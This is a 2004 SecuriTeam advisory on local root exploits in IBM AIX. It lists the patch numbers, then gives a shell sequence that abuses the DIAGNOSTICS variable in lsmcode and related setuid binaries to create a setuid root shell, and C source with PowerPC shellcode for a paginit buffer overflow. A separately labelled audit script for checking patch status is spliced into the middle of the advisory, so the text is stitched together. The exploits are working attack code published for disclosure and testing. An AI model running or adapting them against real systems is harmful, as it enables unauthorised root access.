[EXPL] AIX paginit, lsmcode and invscout Local Exploits

From: SecuriTeam (support_at_securiteam.com)
Date: 12/21/04

    To: list@securiteam.com
    Date: 21 Dec 2004 18:12:22 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      AIX paginit, lsmcode and invscout Local Exploits
    ------------------------------------------------------------------------

    SUMMARY

    The following exploit codes can be used to test your system for the
    vulnerabilities in paginit, lsmcode and invscout, some of which we reported
    in our previous advisory:
    <http://www.securiteam.com/unixfocus/6O00N0AC0A.html> IBM AIX invscout
    Local Command Execution Vulnerability.

    DETAILS

    Vulnerable Systems:
     * IBM's AIX versions 5.1, 5.2 and 5.3

    Solution:
    The vendor has been contacted and has released the following patches:
    1) For the diag bug, bugfix numbers are IY64389(5.1), IY64523(5.2), and
    IY64277(5.3).
    2) For the paginit bug, bugfix numbers are IY64358(5.1), IY64522(5.2), and
    IY64312(5.3).
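    An audit helper, added here and not part of the advisory or of IBM's tooling, that reports whether the setuid-root binaries named in this advisory are present on a host and, on AIX, whether one of the APARs listed above is installed. It assumes `instfix -ik` exits 0 only when all filesets for the given APAR are found.

```shell
#!/bin/sh
# Added audit helper; not part of the advisory or of IBM's tooling. It checks the
# setuid-root binaries named in the advisory and, on AIX, whether one of the
# listed APARs is installed (via instfix -ik).
# Paths from the advisory's ls -l listings; APAR numbers from its Solution section.
DIAG_BINS="/usr/sbin/lsmcode /usr/sbin/diag_exec /usr/sbin/invscout /usr/sbin/invscoutd"
DIAG_APARS="IY64389 IY64523 IY64277"
PAGINIT_BIN="/usr/bin/paginit"
PAGINIT_APARS="IY64358 IY64522 IY64312"
# suid_state PATH -> prints "absent", "nosuid", or "setuid:<owner>"
suid_state() {
  [ -e "$1" ] || { echo absent; return 0; }
  if [ -u "$1" ]; then
    echo "setuid:$(ls -ld "$1" | awk '{print $3}')"
  else
    echo nosuid
  fi
}

# apar_installed "APAR ..." -> 0 if instfix reports any of the per-release APARs.
# Assumption: instfix -ik exits 0 only when all filesets for the APAR are found.
apar_installed() {
  command -v instfix >/dev/null 2>&1 || return 2
  for a in $1; do
    instfix -ik "$a" >/dev/null 2>&1 && return 0
  done
  return 1
}

# audit_bin PATH "APAR ..." -> one report line; returns 1 only if still exposed
audit_bin() {
  st=$(suid_state "$1")
  case "$st" in
    setuid:root)
      if apar_installed "$2"; then
        echo "$1: setuid root, APAR installed"; return 0
      fi
      echo "$1: setuid root, none of [$2] installed: EXPOSED"; return 1 ;;
    *) echo "$1: $st"; return 0 ;;
  esac
}

# audit_all -> runs every check; returns 1 if any binary is still exposed
audit_all() {
  rc=0
  for b in $DIAG_BINS; do audit_bin "$b" "$DIAG_APARS" || rc=1; done
  audit_bin "$PAGINIT_BIN" "$PAGINIT_APARS" || rc=1
  return $rc
}
audit_all || :
```

On a non-AIX host every path reports "absent"; on AIX a binary is reported as EXPOSED only when it is setuid root and none of its per-release APARs is installed.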

    Diag vulnerability:
    There are (at least) 4 broken suid binaries:
    -r-sr-xr-x 1 root system 10014 Sep 16 2002 /usr/sbin/lsmcode
    -r-sr-x--- 1 root system 2796 Jan 26 2003 /usr/sbin/diag_exec
    -r-sr-xr-x 1 root system 450433 Apr 08 2004 /usr/sbin/invscout
    -r-sr-xr-x 1 root system 511362 Apr 08 2004 /usr/sbin/invscoutd

    All these binaries are exploited the same way: the path set in the
    $DIAGNOSTICS environment variable is used by these binaries to execute
    $DIAGNOSTICS/bin/Dctrl as root.

    Example:
    Executing the following gives a root shell:

    mkdirhier /tmp/aap/bin
    export DIAGNOSTICS=/tmp/aap
    cat > /tmp/aap/bin/Dctrl << EOF
    #!/bin/sh
    cp /bin/sh /tmp/.shh
    chown root:system /tmp/.shh
    chmod u+s /tmp/.shh
    EOF
    chmod a+x /tmp/aap/bin/Dctrl
    lsmcode
    /tmp/.shh

    Paginit vulnerability:
    The following setuid binary:
    -r-sr-xr-x 1 root security 7354 Mar 12 2003 /usr/bin/paginit

    Does not do a bounds check on the first command-line argument, which is
    supposed to be a username. If you feed paginit the proper data and hit
    enter, root privileges are gained.

    Exploit:
    /* exploit for /usr/bin/paginit
       tested on: AIX 5.2

       if the exploit fails it's because the shellcode
       ends up at a different address. use dbx to check,
       and change RETADDR accordingly.

       cees-bart <ceesb@cs.ru.nl>
    */

    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>

    #define RETADDR 0x2ff22c90

    char shellcode[] =
    "\x7c\xa5\x2a\x79"
    "\x40\x82\xff\xfd"
    "\x7c\xa8\x02\xa6"
    "\x38\xe0\x11\x11"
    "\x39\x20\x48\x11"
    "\x7c\xc7\x48\x10"
    "\x38\x46\xc9\x05"
    "\x39\x25\x11\x11"
    "\x38\x69\xef\x17"
    "\x38\x87\xee\xef"
    "\x7c\xc9\x03\xa6"
    "\x4e\x80\x04\x20"
    "\x2f\x62\x69\x6e"
    "\x2f\x73\x68\x00"
    ;

    char envlabel[] = "X=";

    /* store x as a 4-byte big-endian value (PowerPC byte order) */
    void printint(char* buf, int x) {
      buf[0] = x >> 24;
      buf[1] = (x >> 16) & 0xff;
      buf[2] = (x >> 8) & 0xff;
      buf[3] = x & 0xff;
    }

    int main(int argc, char **argv) {
      char *env[3];
      char code[1000];   /* environment string: "X=" + landing zone + shellcode */
      char buf[8000];    /* oversized first argument (the "username") */
      char *p, *i;
      int offset1 = 0;

      offset1 = 0; // atoi(argv[1]);

      memset(code, 'C', sizeof(code));
      memcpy(code, envlabel, sizeof(envlabel)-1);
      // landingzone: repeat one instruction so a hit anywhere in it runs on
      // into the shellcode; stop before the last 4 bytes of code[]
      for(i=code+sizeof(envlabel)+offset1; i+4 <= code+sizeof(code); i+=4)
        printint(i, 0x7ca52a79);

      memcpy(code+sizeof(code)-sizeof(shellcode), shellcode, sizeof(shellcode)-1);
      code[sizeof(code)-1] = 0;

      env[0] = code;
      env[1] = 0;

      memset(buf, 'A', sizeof(buf));
      buf[sizeof(buf)-1] = 0;

      p = buf;
      p += 4114;
      printint(p, RETADDR); // try to hit the landingzone
      p += 72;
      printint(p, RETADDR); // any readable address (apparently not overwritten)

      execle("/usr/bin/paginit", "/usr/bin/paginit", buf, (char *)0, env);
      perror("execle");   /* only reached if the exec itself failed */
      return 1;
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:ceesb@cs.ru.nl> cees-bart.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ========================================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


